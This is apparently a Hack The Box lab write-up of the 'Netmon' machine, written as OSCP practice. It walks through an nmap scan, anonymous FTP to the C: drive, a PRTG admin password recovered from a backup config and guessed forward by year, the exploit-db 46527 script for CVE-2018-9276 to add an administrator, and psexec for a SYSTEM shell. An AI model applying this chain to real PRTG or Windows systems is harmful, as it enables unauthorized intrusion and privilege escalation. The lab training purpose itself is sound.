Netmon - Easy

OSCP Prep Box

Introduction@Netmon:~$

Name

Netmon

10.10.10.152

Window

Points

Difficulty

Easy

Creator

mrb3n

Release Date

02 March 2019

Enumeration

Nmap

# Nmap 7.92 scan initiated Thu Dec 23 15:58:37 2021 as: nmap -sC -sV -oN nmap.out 10.10.10.152
Nmap scan report for netmon.htb (10.10.10.152)
Host is up (0.35s latency).
Not shown: 995 closed tcp ports (reset)
PORT    STATE SERVICE      VERSION
21/tcp  open  ftp          Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 02-02-19  11:18PM                 1024 .rnd
| 02-25-19  09:15PM       <DIR>          inetpub
| 07-16-16  08:18AM       <DIR>          PerfLogs
| 02-25-19  09:56PM       <DIR>          Program Files
| 02-02-19  11:28PM       <DIR>          Program Files (x86)
| 02-03-19  07:08AM       <DIR>          Users
|_02-25-19  10:49PM       <DIR>          Windows
80/tcp  open  http         Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor)
|_http-trane-info: Problem with XML parsing of /evox/about
| http-title: Welcome | PRTG Network Monitor (NETMON)
|_Requested resource was /index.htm
|_http-server-header: PRTG/18.1.37.13946
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-12-23T09:37:47
|_  start_date: 2021-12-23T09:36:30
|_clock-skew: mean: 8m49s, deviation: 0s, median: 8m49s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Dec 23 15:59:03 2021 -- 1 IP address (1 host up) scanned in 26.48 seconds

FTP can login with Anonymous

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ftp 10.10.10.152
Connected to 10.10.10.152.
220 Microsoft FTP Service
Name (10.10.10.152:sheinn101): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-02-19  11:18PM                 1024 .rnd
02-25-19  09:15PM       <DIR>          inetpub
07-16-16  08:18AM       <DIR>          PerfLogs
02-25-19  09:56PM       <DIR>          Program Files
02-02-19  11:28PM       <DIR>          Program Files (x86)
02-03-19  07:08AM       <DIR>          Users
12-23-21  05:20AM       <DIR>          Windows
226 Transfer complete.
ftp>

It seem like ftp root directory is c:\

Getting User.txt

ftp> cd users
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-25-19  10:44PM       <DIR>          Administrator
12-23-21  05:13AM       <DIR>          Public
226 Transfer complete.
ftp> cd Public
250 CWD command successful.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
02-03-19  07:05AM       <DIR>          Documents
07-16-16  08:18AM       <DIR>          Downloads
07-16-16  08:18AM       <DIR>          Music
07-16-16  08:18AM       <DIR>          Pictures
12-23-21  05:18AM                   94 tester.txt
12-23-21  04:37AM                   34 user.txt
07-16-16  08:18AM       <DIR>          Videos
226 Transfer complete.
ftp> get user.txt
local: user.txt remote: user.txt
200 PORT command successful.
150 Opening ASCII mode data connection.
226 Transfer complete.
34 bytes received in 0.33 secs (0.0999 kB/s)
ftp> exit
221 Goodbye.
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ cat user.txt 
f876bb779c4439a08f27e9b0404e6fb5

We can easily get user flag with ftp anonymous.

Web

It PRTG Network Monitor (NETMON) page and we should try default credential which is prtgadmin:prtgadmin . But it doesn't work in here. We need to search the credential in FTP login.

After poke around, found PRTG Network Configuration File in this location \ProgramData\Paessler\PRTG Network Monitor.

ftp> cd "\ProgramData\Paessler\PRTG Network Monitor"
250 CWD command successful.
ftp> ls -al
200 PORT command successful.
150 Opening ASCII mode data connection.
12-15-21  07:23AM       <DIR>          Configuration Auto-Backups
12-23-21  04:36AM       <DIR>          Log Database
02-02-19  11:18PM       <DIR>          Logs (Debug)
02-02-19  11:18PM       <DIR>          Logs (Sensors)
02-02-19  11:18PM       <DIR>          Logs (System)
12-23-21  04:36AM       <DIR>          Logs (Web Server)
12-23-21  04:42AM       <DIR>          Monitoring Database
02-25-19  09:54PM              1189697 PRTG Configuration.dat
02-25-19  09:54PM              1189697 PRTG Configuration.old
07-14-18  02:13AM              1153755 PRTG Configuration.old.bak
12-23-21  05:18AM              1671248 PRTG Graph Data Cache.dat
02-25-19  10:00PM       <DIR>          Report PDFs
02-02-19  11:18PM       <DIR>          System Information Database
02-02-19  11:40PM       <DIR>          Ticket Database
02-02-19  11:18PM       <DIR>          ToDo Database
226 Transfer complete.
ftp> get "PRTG Configuration.old.bak"

<dbpassword>
	<!-- User: prtgadmin -->
	PrTg@dmin2018
</dbpassword>

Let's try with this credentials in Login Page.

But it doesn't work, if we look again password structure PrTg@dmin2018 .It end with 2018 and the configuration file is also a backup file. So we should change that year in password. I tried it with PrTg@dmin2019 and It was worked.

Geting Administrator

We can see version of that page on the left bottom and now we should try to search exploit for that.

We will use this exploitdb bash script.

https://www.exploit-db.com/exploits/46527

If we execute this bash script, you may get error like this

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 
-bash: ./46527.sh: /bin/bash^M: bad interpreter: No such file or directory
┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$

Run the following command to fix that error.

sed -i -e 's/\r$//' 46527.sh

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]
└──╼ [??]$ ./46527.sh 

[+]#########################################################################[+] 
[*] Authenticated PRTG network Monitor remote code execution                [*] 
[+]#########################################################################[+] 
[*] Date: 11/03/2019                                                        [*] 
[+]#########################################################################[+] 
[*] Author: https://github.com/M4LV0   lorn3m4lvo@protonmail.com            [*] 
[+]#########################################################################[+] 
[*] Vendor Homepage: https://www.paessler.com/prtg                          [*] 
[*] Version: 18.2.38                                                        [*] 
[*] CVE: CVE-2018-9276                                                      [*] 
[*] Reference: https://www.codewatch.org/blog/?p=453                        [*] 
[+]#########################################################################[+] 

# login to the app, default creds are prtgadmin/prtgadmin. once athenticated grab your cookie and use it with the script.
# run the script to create a new user 'pentest' in the administrators group with password 'P3nT3st!' 

[+]#########################################################################[+] 
 EXAMPLE USAGE: ./prtg-exploit.sh -u http://10.10.10.10 -c "_ga=GA1.4.XXXXXXX.XXXXXXXX; _gid=GA1.4.XXXXXXXXXX.XXXXXXXXXXXX; OCTOPUS1813713946=XXXXXXXXXXXXXXXXXXXXXXXXXXXXX; _gat=1"

We need to get cookie using burp to run this script.

./46527.sh -u http://10.10.10.152 -c "_ga=GA1.2.2019227520.1640252936; _gid=GA1.2.125523594.1640252936; OCTOPUS1813713946=e0RGRUJCNzI0LTBDMzYtNDk5Q04QzIzLUY3ODVEODJFQjJDNX0%3D"

Now we created a new user with this credential pentest:P3nT3st! Login with psexec.py

┌─[sheinn101@parrot]─[~/htb/oscp/netmon]                                                                                                     
└──╼ [??]$ python3 /usr/share/doc/python3-impacket/examples/psexec.py pentest:"P3nT3st!"@10.10.10.152                                                                 
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation                                                                                                              
                                                                                                                                                                      
[*] Requesting shares on 10.10.10.152.....                                                                                                                            
[*] Found writable share ADMIN$                                                                                                                                       
[*] Uploading file xHANHcvF.exe                                                                                                                                       
[*] Opening SVCManager on 10.10.10.152.....                                                                                                                           
[*] Creating service KSTQ on 10.10.10.152.....                                                                                                                        
[*] Starting service KSTQ.....                                                                                                                                        
[!] Press help for extra shell commands                                                                                                                               
Microsoft Windows [Version 10.0.14393]                                                                                                                                
(c) 2016 Microsoft Corporation. All rights reserved. 
                                                                                                                                                                      
C:\Windows\system32>cd c:\users\administrator\desktop                                                                                                                 
                                                                                                                                                                      
c:\Users\Administrator\Desktop>dir                                                                                                                                    
 Volume in drive C has no label.                                                                                                                                      
 Volume Serial Number is 0EF5-E5E5                                                                                                                                    
                                                                                                                                                                      
 Directory of c:\Users\Administrator\Desktop                                                                                                                          
                                                                                                                                                                      
02/02/2019  11:35 PM    <DIR>          .                                                                                                                              
t02/02/2019  11:35 PM    <DIR>          ..                                                                                                                            
yp12/23/2021  04:37 AM                34 root.txte                                                                                                                    
                1 File(s)             34 bytes                                    
ro               2 Dir(s)   6,758,518,784 bytes free     
ot                                                                                 
.c:\Users\Administrator\Desktop>type root.txt                                      
52a75d9617892bb0d16e610dbf2e8787

https://app.hackthebox.com/profile/237587

Resources

https://www.exploit-db.com/exploits/46527
https://www.codewatch.org/blog/?p=453

PreviousBashed - Easy NextSeal - Medium

Last updated 3 years ago